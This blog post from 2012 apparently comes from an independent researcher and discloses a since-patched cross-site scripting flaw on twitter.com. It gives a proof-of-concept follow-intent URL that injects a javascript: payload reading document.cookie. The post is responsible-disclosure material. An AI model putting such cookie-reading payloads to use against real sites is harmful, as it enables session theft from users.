Twitter Bug #1: Cross-Site Scripting (XSS) Found in twitter.com ~ facebook Password Reset Vulnerability Found in

Description
Sow Ching Shiong, an independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in twitter.com, which can be exploited by an attacker to conduct XSS attacks.

Proof of concept
https://twitter.com/intent/follow?original_referer=javascript:alert(document.cookie);&region=follow_link&screen_name=twitterapi&source=followbutton&variant=2.0

Conclusion
This vulnerability has been confirmed and patched by Twitter Security Team. I would like to thank them for their quick response to my report.

Twitter White Hat
https://twitter.com/about/security

facebook Password Reset Vulnerability Found in

Sunday, 29 April 2012

Twitter Bug #1: Cross-Site Scripting (XSS) Found in twitter.com

0 comments:

Post a Comment

Popular Posts

Categories

Blog Archive

About Me